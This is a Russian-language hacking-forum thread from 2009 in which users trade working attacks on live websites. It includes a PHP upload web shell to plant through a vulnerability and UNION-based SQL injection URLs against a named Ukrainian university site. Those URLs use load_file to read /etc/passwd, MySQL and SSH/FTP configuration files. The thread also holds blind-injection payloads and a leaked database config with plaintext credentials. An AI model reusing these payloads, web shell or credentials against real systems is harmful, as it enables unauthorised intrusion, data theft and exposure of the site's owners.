ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.10.2009, 21:41
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме: 461696
Репутация:
40
|
|
M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость
PHP код:
<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>
И заливаешь любой файл со своего компа
Последний раз редактировалось _gr34t; 25.10.2009 в 11:42..
|
|
|

24.10.2009, 22:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
ребята подскажите где лежыт PHP.ini на linux по умолчанию!!!???
Strilo4ka, смотря какая ОС и как сервер настроен.
/etc/php.ini (Red Hat Linux, SuSE / Novell Linux)
/etc/php4/apache/php.ini (Debian woody and sarge, Ubuntu 6.10 с php4 и apache 1.3)
/etc/php5/apache2/php.ini (Ubuntu 6.10 с php5 и apache2, Debian etch)
/etc/httpd/php.ini (Trustix Secure Linux 3.0)
/usr/local/php/lib/php.ini (Mac OS X использующий пакет Marc Liyanage's PHP)
/etc/apache/php.ini (Slackware 10.x)
/var/www/conf/php.ini (OpenBSD)
/usr/local/etc/php.ini (FreeBSD)
/usr/pkg/etc/php.ini (NetBSD)
Gentoo Linux:
/etc/php/apache2-php4/php.ini
/etc/php/cli-php4/php.ini
/etc/apache2/php.ini
|
|
|

24.10.2009, 22:17
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
Сообщение от _gr34t
Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят 
3 мускул ,мда редкий зверь .
без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов
|
|
|

24.10.2009, 22:34
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
Код:
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+1,load_file(0x2f6574632f7068702e696e69),3,4,5--+
используй load_file()
Далее манимулируй для полного вывода данных.
ВСЕ можна вывести через первый столбец:
Код:
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7068702e696e69),2,3,4,5--+
|
|
|

25.10.2009, 00:46
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от Aртем
> Я не понимаю почему именно такой способ перебора?
Это скорее всего не способ перебора, а проверка возможных фильтраций и реагирование скрипта на запросы.
Можно конечно перебирать основываясь на ошибки, можно даже использовать какой-нибудь специализированный софт или же что-нибудь подобное. Но меня интересует непосредственно ручная работа.
И линк к сожалению я дать не могу.
Но если кто-нибудь мне сможет дать уже готовых скриптов в которых есть уязвимости подобного характера, для повышения собственного уровня знаний в этом направлении буду благодарен.
Потому как с Blind SQL inj встречаюсь довольно редко, точнее старался их избегать, но как показала практика, знания в этой области мне необходимы, т.к. они попросту видимо отсутствуют, и еще был бы признателен на соответствующие статьи по поводу Blind SQL быть может я что-то упустил.
Хотелось бы услышать ответ на мой вопрос.
|
|
|

25.10.2009, 01:13
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Aртем
Хотелось бы услышать ответ на мой вопрос.
Тут нет никакого вопроса. Ты не первый день на форуме. Статьи все в разделе СТАТЬИ, а слепые скули, конечно тебе никто собирать не будет. Поиск по теме SQL думаю поможет нарыть кучу примеров, в конце концов на локалке напиши скрипт и тренируйся, если интересно. И не обязательно искать слепые, можешь на любой пробовать, просто расскручивай её как будто вывода нет, вот и вся практика.
|
|
|

25.10.2009, 03:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
Артем, если вопрос был про and/or, то:
1. true'>if(locate(1,(substring((select+id+from+users +where+id=1),1,1))),0,1)
2. false' union select * from table where locate(...)
если про практику, то ответ в последней строчке постом выше
|
|
|

25.10.2009, 04:49
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
может так легче?
http://www.univd.edu.ua/serverdb.inc
Код:
?php
//$server = "80.73.1.156";
$server = "localhost";
$user = "univd";
$pwd = "biohazard";
//$server = "localhost:3306";
//$user = "cardinal";
//$pwd = "cfiekz";
$con = mysql_connect($server, $user, $pwd);
mysql_select_db("univd", $con);
$maxbook = 10;
?>
http://www.univd.edu.ua/dumper/dumper.php
|
|
|

25.10.2009, 05:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от Strilo4ka
блин помогите найти логи какие нибуть на _http://www.univd.edu.ua/.
?>
toolza, 7 пункт главного меню, 6 метод, только гет методом, но там ничего интересного нет:
Код:
/etc/ssh/sshd_config
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7373682f737368645f636f6e666967),2,3,4,5--+
------------------------------------
/etc/passwd
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f706173737764),2,3,4,5--+
------------------------------------
/etc/vsftpd.chroot_list
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e6368726f6f745f6c697374),2,3,4,5--+
------------------------------------
/etc/my.cnf
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f6d792e636e66),2,3,4,5--+
------------------------------------
/etc/vsftpd.conf
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e636f6e66),2,3,4,5--+
------------------------------------
/usr/bin/grep
------------------------------------
http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f7573722f62696e2f67726570),2,3,4,5--+
а вообще там менты, так что поаккуратней
|
|
|

25.10.2009, 05:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
https://forum.antichat.ru/thread148915.html
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|